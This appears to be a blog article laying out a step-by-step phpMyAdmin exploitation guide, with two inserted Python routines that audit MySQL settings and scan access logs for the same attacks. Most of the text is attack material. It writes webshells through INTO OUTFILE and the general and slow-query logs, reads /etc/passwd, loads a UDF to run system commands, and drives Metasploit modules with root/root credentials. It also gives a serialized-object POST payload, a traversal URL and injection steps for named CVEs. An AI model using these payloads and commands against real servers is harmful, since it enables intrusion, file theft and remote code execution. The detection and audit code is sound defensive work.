Information Security 19 min read

Comprehensive phpMyAdmin Vulnerability Exploitation Guide

This article provides an extensive overview of phpMyAdmin security weaknesses, detailing information‑gathering techniques, version detection, path discovery, multiple exploitation methods such as file writes, log manipulation, slow‑query abuse, user‑defined functions, MOF attacks, and step‑by‑step PoCs for numerous CVEs, all illustrated with concrete SQL and script examples.

Laravel Tech Community

0x01 Information Gathering

1.1 Version Information

Appending common filenames such as readme.php, README, changelog.php, or Documentation.html to the web root URL reveals the phpMyAdmin version if the administrator has not removed them.

readme.php
README
changelog.php
Change
Documentation.html
Documentation.txt
translators.html

Alternatively, the directory /doc/html/index.html can be accessed directly.

1.2 Absolute Path Discovery

Methods include:

Viewing the phpinfo() page, which often displays the web root.

Triggering web errors to leak absolute paths.

Inspecting configuration files of bundled stacks (e.g., phpStudy, LAMPP) for database paths.

Executing SHOW VARIABLES LIKE '%datadir%'; to obtain the MySQL data directory.

Using SELECT LOAD_FILE('/etc/passwd'); or similar to read system files.

Testing write permissions with SELECT 'test' INTO OUTFILE '/var/www/$fuzz$/shell.php';

show variables like '%datadir%';

0x02 phpMyAdmin Exploitation

2.1 Writing Files to Obtain a Web Shell

Prerequisites:

Database user with root privileges.

Knowledge of the web server's absolute path.

Write permission for the database user on the target directory.

2.1.1 Direct Write via INTO OUTFILE

Direct file write using SELECT ... INTO OUTFILE requires the above conditions and that secure_file_priv is either empty or points to a writable directory.

SELECT "
" INTO OUTFILE "d:\phpstudy\www\7.php";

2.1.2 Writing via General Log

Enable the general log, locate its directory, set a custom log file inside the web root, and then inject PHP code as a log entry.

SET GLOBAL general_log = "ON";
SHOW VARIABLES LIKE 'general%';
SET GLOBAL general_log_file = "C:/phpStudy/PHPTutorial/WWW/404.php";
SELECT "
";

2.1.3 Writing via Slow Query Log

Similar to the general log, but using the slow‑query log.

SHOW VARIABLES LIKE '%slow%';
SET GLOBAL slow_query_log_file='C:/phpStudy/PHPTutorial/WWW/slow.php';
SET GLOBAL slow_query_log=ON;
SELECT '
' FROM mysql.db WHERE SLEEP(10);

2.2 User‑Defined Functions (UDF)

Applicable to both Windows and Linux. The attacker must have write access to the MySQL plugin directory (lib/plugin) or be able to place a shared library in a writable location. Example steps:

SHOW VARIABLES LIKE '%plugin%';
SELECT 'It is dll' INTO DUMPFILE 'C:\Program Files\MySQL\MySQL Server 5.1\lib\plugin\lib_mysqludf_sys.dll';
CREATE FUNCTION sys_eval RETURNS STRING SONAME "lib_mysqludf_sys.dll";
SELECT sys_eval('whoami');
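The preconditions in 2.1.1 through 2.2 are all visible in SHOW VARIABLES output, so an administrator can audit for them. The following is an added example and not code from the original article; the sample variables are constructed, and WEB_ROOT is an assumption about where the web server serves files from.

```python
"""Audit SHOW VARIABLES output for the file-write and UDF preconditions
described above (added example, not from the original article).

The sample variables are constructed, and WEB_ROOT is an assumption.
"""
import posixpath

# Constructed sample: what a misconfigured bundled install might report.
SAMPLE_VARIABLES = {
    "secure_file_priv": "",
    "general_log": "ON",
    "general_log_file": "C:/phpStudy/PHPTutorial/WWW/404.php",
    "slow_query_log": "ON",
    "slow_query_log_file": "C:/phpStudy/PHPTutorial/WWW/slow.php",
    "plugin_dir": "C:/Program Files/MySQL/MySQL Server 5.1/lib/plugin/",
}
WEB_ROOT = "C:/phpStudy/PHPTutorial/WWW"  # assumption: the served directory


def _norm(path: str) -> str:
    # Normalise separators and case so Windows paths compare reliably.
    return posixpath.normpath(path.replace("\\", "/")).rstrip("/").lower()


def _under(path: str, root: str) -> bool:
    p, r = _norm(path), _norm(root)
    return p == r or p.startswith(r + "/")


def audit_mysql_variables(variables: dict, web_root: str) -> list:
    """Return a list of findings; an empty list means none of the checked
    conditions is present. Values are strings as SHOW VARIABLES prints them."""
    findings = []
    sfp = variables.get("secure_file_priv")
    if sfp == "":
        findings.append("secure_file_priv is empty: INTO OUTFILE/DUMPFILE may write anywhere the server can")
    elif sfp is not None and _under(sfp, web_root):
        findings.append("secure_file_priv points inside the web root")
    for flag, logfile in (("general_log", "general_log_file"), ("slow_query_log", "slow_query_log_file")):
        path = variables.get(logfile, "")
        if variables.get(flag, "OFF").upper() == "ON" and _under(path, web_root):
            findings.append(f"{logfile} is inside the web root while {flag} is ON: {path}")
        if path.lower().endswith(".php"):
            findings.append(f"{logfile} has a .php extension: {path}")
    if _under(variables.get("plugin_dir", ""), web_root):
        findings.append("plugin_dir is inside the web root")
    return findings
```

Feed it the rows of SHOW VARIABLES from each server you administer; a hardened install reports secure_file_priv as NULL or a non-web directory and keeps both log files outside the document root.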

2.3 MOF Privilege Escalation

On Windows ≤ 2003 where the C:\Windows\System32\mof directory is writable, an attacker can write a malicious MOF file via MySQL and achieve code execution every five seconds.

use exploit/windows/mysql/mysql_mof
set rhost 192.168.1.5
set rport 3306
set username root
set password root
exploit

0x03 Specific phpMyAdmin Vulnerabilities

3.1 WooYun‑2016‑199433 – Arbitrary File Read

Affected versions: phpMyAdmin 2.x.

POST /scripts/setup.php HTTP/1.1
Host: target:8080
Content-Type: application/x-www-form-urlencoded
Content-Length: 80

action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}

3.2 CVE‑2014‑8959 – Local File Inclusion

Affected versions: 4.0.1‑4.2.12 with PHP < 5.3.4.

/gis_data_editor.php?token=...&gis_data[gis_type]=/../../../../phpinfo.txt%00

3.3 CVE‑2016‑5734 – Remote Code Execution via Find/Replace

Exploits the tbl_find_replace.php endpoint after authenticating to phpMyAdmin. A Python script (shown in the source) automates token retrieval, table creation, and payload injection.

3.4 CVE‑2018‑12613 – Backend File Inclusion

Writes PHP code into a session file using SELECT ... and then includes the session file via a crafted URL.

3.5 CVE‑2018‑19968 – Arbitrary File Inclusion / RCE

Creates a database, stores PHP code in a table, generates a phpMyAdmin configuration entry, and finally includes the malicious session file.

3.6 CVE‑2020‑0554 – SQL Injection in server_privileges.php

By sending a crafted GET request with ajax_requests=true, validate_username=1, and a malicious username parameter, an attacker can execute arbitrary SQL and extract data via error-based injection.
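The request shapes in 3.1, 3.2 and 3.6 each leave a recognisable trace in web-server access logs. The following detection routine is an added example and not code from the original article; the log lines are constructed in Apache combined format with no real hosts, and the /pma/ mount prefix is an assumption.

```python
"""Flag access-log requests matching the request shapes of sections 3.1,
3.2 and 3.6 (added example, not from the original article).

SAMPLE_LOG is constructed (Apache combined format, no real hosts); the
/pma/ prefix is an assumption about where phpMyAdmin is mounted.
"""
import re
from urllib.parse import parse_qs, urlsplit

SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "POST /pma/scripts/setup.php HTTP/1.1" 200 512 "-" "curl/7.88"
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /pma/gis_data_editor.php?token=abc&gis_data%5Bgis_type%5D=/../../../../phpinfo.txt%00 HTTP/1.1" 200 311 "-" "curl/7.88"
10.0.0.6 - - [01/Jan/2024:10:00:02 +0000] "GET /pma/server_privileges.php?ajax_requests=true&validate_username=1&username=x%27%20OR%201%3D1-- HTTP/1.1" 200 700 "-" "Mozilla/5.0"
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /pma/index.php?route=/sql HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def classify_request(method: str, target: str):
    """Return an indicator label for one request, or None."""
    parts = urlsplit(target)
    path = parts.path.lower()
    query = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes keys and values
    # 3.1: POST to the legacy setup script. The body is not logged, so the
    # endpoint itself is the signal; expect noise if setup is legitimately in use.
    if method == "POST" and path.endswith("/scripts/setup.php"):
        return "setup.php POST (WooYun-2016-199433 surface)"
    # 3.2: gis_type carrying path traversal or a NUL byte.
    if path.endswith("/gis_data_editor.php"):
        gis_type = "".join(query.get("gis_data[gis_type]", []))
        if "../" in gis_type or "\x00" in gis_type:
            return "gis_data_editor.php traversal (CVE-2014-8959 pattern)"
    # 3.6: username validation request whose username carries SQL metacharacters.
    if path.endswith("/server_privileges.php") and "validate_username" in query:
        username = "".join(query.get("username", []))
        if re.search(r"""['"()#]|--|/\*""", username):
            return "server_privileges.php username injection (CVE-2020-0554 pattern)"
    return None


def scan_access_log(text: str) -> list:
    """Return (request_target, label) pairs for every flagged line."""
    hits = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if m:
            label = classify_request(m.group("method"), m.group("target"))
            if label:
                hits.append((m.group("target"), label))
    return hits
```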

3.7 CVE‑2019‑12922 – CSRF to Delete Servers

After logging in, an attacker adds a server entry, then crafts a malicious image request that triggers a server‑deletion request on behalf of the victim.

3.8 CVE‑2017‑1000499 – CSRF for Various Actions

Demonstrates CSRF payloads for password change, arbitrary file write, DNS data exfiltration, and mass row deletion using hidden <img> tags.

0x04 Special Versions – GetShell Techniques

4.1 CVE‑2013‑3238

Affected: 3.5.x < 3.5.8.1 and 4.0.0-rc3. Exploited via the Metasploit module exploit/multi/http/phpmyadmin_preg_replace.

4.2 CVE‑2012‑5159

Affected: phpMyAdmin 3.5.2.2. Exploited via the Metasploit module exploit/multi/http/phpmyadmin_3522_backdoor.

4.3 CVE‑2009‑1151 – Config File Command Execution

Affected: 2.11.x < 2.11.9.5 and 3.x < 3.1.3.1. Exploited via the Metasploit module exploit/unix/webapp/phpmyadmin_config.

4.4 Weak and Universal Passwords

Some early phpMyAdmin releases allow login as root without a password or accept a universal password for the user 'localhost'@'@'.

--- End of Summary ---

Tags: SQL injection, CVE, vulnerability, exploitation, phpMyAdmin
Written by

Laravel Tech Community

Specializing in Laravel development, we continuously publish fresh content and grow alongside the elegant, stable Laravel framework.
